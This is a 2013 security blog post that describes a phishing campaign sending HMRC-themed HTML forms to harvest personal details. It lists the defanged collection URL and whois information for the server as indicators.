• Subscribe to our RSS feed.
  • Twitter
  • StumbleUpon
  • Reddit
  • Facebook
  • Digg
  • Delicious

Anti-Malware Laboratory

Yet Another Malware Blog

About

An informal blog from your friendly neighborhood software security humans.

Blog Archive

  • ►  2015 (5)
    • ►  October (1)
    • ►  August (2)
    • ►  May (1)
    • ►  March (1)
  • ►  2014 (8)
    • ►  October (1)
    • ►  July (1)
    • ►  June (1)
    • ►  May (4)
    • ►  April (1)
  • ▼  2013 (12)
    • ►  December (3)
    • ►  November (5)
    • ▼  August (2)
      • Phishing targets HM Revenue & Customs clients
      • Bank of America spam: An Analysis
    • ►  March (2)
  • ►  2012 (35)
    • ►  April (4)
    • ►  March (12)
    • ►  February (17)
    • ►  January (2)

Categories

adobe (1) android (10) android february (1) baksmali (1) Black Hole (2) crimepack (1) disassembler (1) exploit (3) Exploits (4) Fakeav Winrar sfx (1) Fishbowl (1) flash (1) gift certificates (1) Google Authenticator (1) google play (1) hcp (1) java (1) Malware (5) mdac (1) Mobile (24) NSA Mobility Program (1) obfuscated script (1) pdf (1) Reversing (2) rhino (1) skype (1) smali (1) spam (1) test (1) Unpacking (1) vouchers (1) vulnerability (3)

Popular Posts

  • Bank of America spam: An Analysis
    An email claiming to be from Bank of America lures users to open an attachment that shows how to open secure emails from the bank. The mess...
  • [BE CAUTIOUS] Dragon Ball Z: Resurrection of F MALWARE and SCAM
    Be wary of downloading movies in torrent sites.  Executables can also be executed with a file size as huge as a gigabyte...
  • Unpacking MFC Compiled CryptoWall Malware
    Unpacking MFC Compiled CryptoWall Malware Introduction First and foremost, this article does not intend to analyze what CryptoWall malw...

Visitors to this blog

Wednesday, August 28, 2013

Phishing targets HM Revenue & Customs clients

Posted on Wednesday, August 28, 2013 by Red Horse | No comments
A new phishing targets HM Revenue & Customs clients. HM Revenue & Customs is an institution tied with the UK government responsible for UK's tax.

The phishing email contains these:



With a zip archive attachment that contains an HTML file named HM Revenue & Customs - Details.html.

Once the html file is opened, it shows this form:



The form looks legit since it uses images directly from the HMRC website.

When submitted, every information entered are sent to 
h00p://nagios.net1.com.kh/nagiosweb/Lang.php


At the time of this writing, directing to the site where the information is sent to was probably shot down and now returns a 404.

A simple whois query about the server shows: 

domain: nagios.net1.com.kh
current ip: 202.131.87.67
nameserver: ns1.cambotech.com
nameserver: ns2.cambotech.com
reverse lookup domains based on ip: 
  nagios.net1.com.kh
  crm.netone.com.kh

Located in Cambodia.

Nothing malware file was downloaded. Everything was plain and simple phishing and stealing.

Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest
Newer Post Older Post Home

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)
volute-glacial
volute-glacial
 volute-glacial
volute-glacial
Copyright © Anti-Malware Laboratory | Powered by Blogger
Design by Fabthemes | Blogger Template by NewBloggerThemes.com